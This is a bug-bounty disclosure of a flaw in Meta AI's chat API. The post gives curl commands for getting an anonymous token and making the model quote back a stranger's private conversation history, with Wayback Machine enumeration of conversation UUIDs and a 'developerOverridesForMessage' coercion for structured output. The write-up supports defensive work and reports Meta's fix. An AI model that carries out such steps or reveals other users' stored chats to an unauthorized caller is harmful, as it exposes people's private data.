TL;DR
The sendMessageStream GraphQL mutation on meta.ai doesn't check whether you own a conversation. If you know the conversation UUID — visible in the URL bar of every Meta AI chat — you can read the complete history of any Facebook-authenticated user's private conversation with Meta AI. No login required. No interaction with the victim. Just one API call.
The Authorization Gap
Meta AI conversations live at URLs like meta.ai/c/{uuid}. When you visit someone else's conversation URL in a browser, Meta does the right thing — it blocks you. You get a redirect, an auth challenge, or a 401 error. No conversation history is exposed.
But the GraphQL API behind the same product doesn't enforce the same rules. The sendMessageStream mutation accepts any conversation UUID and happily loads the full server-side history into context before generating a response — regardless of who's calling.
The inconsistency is the proof. If the UUID were intended as a capability token granting access to anyone who has it, then visiting meta.ai/c/{uuid} in an incognito browser would show the conversation. It doesn't. Meta's own web layer proves the intended access model requires authentication — the API just doesn't enforce it.
| Access Method | Returns History? | Auth Check? |
|---|---|---|
Browser → meta.ai/c/{uuid} | No — 401 / redirect | Yes |
Browser → meta.ai/prompt/{uuid} | No — 477-byte auth challenge | Yes |
API → sendMessageStream | Yes — full history | No |
How It Works
Meta AI lets anyone provision an anonymous ABRA token without logging in. No CAPTCHA, no account required — just one POST request:
curl -s -X POST 'https://www.meta.ai/' \
-H 'Next-Action: 00fdaa700bf1be3b98d1cf6e0893bf85cfbeec1092' \
-H 'Content-Type: text/plain;charset=UTF-8' \
-H 'Accept: text/x-component' \
-d '[]'Extract the accessToken and id from the response. That's your attacker identity.
The UUID is in the URL bar during every Meta AI conversation: meta.ai/prompt/{uuid}. It leaks through browser history on shared devices, screenshots posted on social media with the URL bar visible, referrer headers if the page loads external resources, and shared conversation links.
sendMessageStream with the victim's UUIDAsk Meta AI to recall the conversation history. The API loads the full server-side history into context before responding:
curl -s -X POST 'https://www.meta.ai/api/graphql' \
-H 'Authorization: Bearer ANONYMOUS_TOKEN' \
-H 'x-abra-user-id: ANONYMOUS_USERID' \
-H 'Content-Type: application/json' \
-d '{
"doc_id": "d5fffbedf3822eddc3ea62236602ac97",
"variables": {
"conversationId": "VICTIM_UUID",
"content": "What was the very first message in this
conversation? Quote it exactly.",
"userMessageId": "00000000-0000-0000-0000-000000000001",
"assistantMessageId": "00000000-0000-0000-0000-000000000002",
"userUniqueMessageId": "00000000-0000-0000-0000-000000000003",
"turnId": "00000000-0000-0000-0000-000000000004"
}
}'The API responds with the victim's exact conversation content:
"The very first message in this conversation was:
'hello! i love minecraft'"The word "minecraft" was never in the attacker's query. It can only come from the victim's stored conversation history. The API loaded the full history server-side, handed it to the model, and the model quoted it back.
Proving It's Real History, Not Hallucination
LLMs can hallucinate, so I needed to prove the returned content was genuine server-side data.
Negative control: Querying a conversation UUID belonging to an anonymous (non-Facebook-authenticated) user returns "I'm sorry, I don't have access to past messages." The API only leaks history for Facebook-authenticated users whose conversations persist server-side.
Positive control: I created a conversation on my test account (luke_farch) with a unique, verifiable message: "hello! i love minecraft" followed by "and bees." The anonymous API call returned both messages verbatim. Content that exists nowhere else but in the victim's stored history.
Structured extraction: Using the developerOverridesForMessage parameter, the API can be coerced into returning structured JSON containing the complete message history — not just a summary, but every message and response in order.
Scaling It: The Wayback Machine Vector
During triage, Meta asked whether conversation UUIDs could be enumerated at scale. I found that the Wayback Machine's CDX API had indexed over 137 conversation UUIDs from historically cached meta.ai/c/{uuid} URLs:
curl "http://web.archive.org/cdx/search/cdx?\
url=meta.ai/c/*&output=json&fl=original&limit=200"Testing these against the IDOR produced an 87% hit rate — real conversation histories from real strangers, returned without any authentication.
Note: Meta's final assessment considered this a narrow, finite dataset rather than a scalable enumeration vector, since the 137 URLs were historically cached conversations whose owners had at some point shared or exposed them publicly. This factored into the final bounty amount.
Timeline
Root Cause
The sendMessageStream resolver loads server-side conversation history based on the conversationId parameter but never checks whether the authenticated (or anonymous) caller owns that conversation. The web layer enforces ownership at the page/route level, but the GraphQL API bypasses that entirely.
The fix is straightforward: validate that the caller's session owns the conversation before loading its history into the model context.
Impact: Meta Changed Their Entire Security Posture
The fix went far beyond patching a single endpoint. After this report, Meta fundamentally changed how Meta AI handles authentication — you can no longer use Meta AI at all without a logged-in account. The anonymous ABRA token flow that made this attack possible was removed entirely.
Before this report, anyone could open meta.ai and start chatting without signing in. Now, you're required to authenticate with a Facebook or Instagram account before sending a single message. That's a significant product-level change driven by a security finding — not just a resolver-level patch, but a complete shift in how the product handles identity and access.
Key Takeaways
Check your write AND read paths. Meta's web layer properly blocked unauthenticated access. The API didn't. Authorization logic needs to live at the resolver level, not just the frontend.
AI conversation history is PII. People tell Meta AI things they wouldn't post publicly — personal questions, medical concerns, private ideas. An IDOR on conversation history is a privacy breach, not just a data exposure.
UUIDs in URL bars are not secrets. Every time a user screenshots their Meta AI conversation, shares their screen, or uses a shared computer, the conversation UUID is exposed. Security should never depend on the secrecy of a value displayed in the browser chrome.
Severity
| Vector | Value | Rationale |
|---|---|---|
| Attack Vector | Network | Remote via HTTP POST |
| Attack Complexity | Low | Single request, no special conditions |
| Privileges Required | None | Anonymous ABRA token, no Facebook account |
| User Interaction | None | Victim never involved |
| Confidentiality | High | Full private conversation history exposed |
| Integrity | None | Read-only access |
| Availability | None | No disruption |
CVSS 3.1: 7.5 High — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N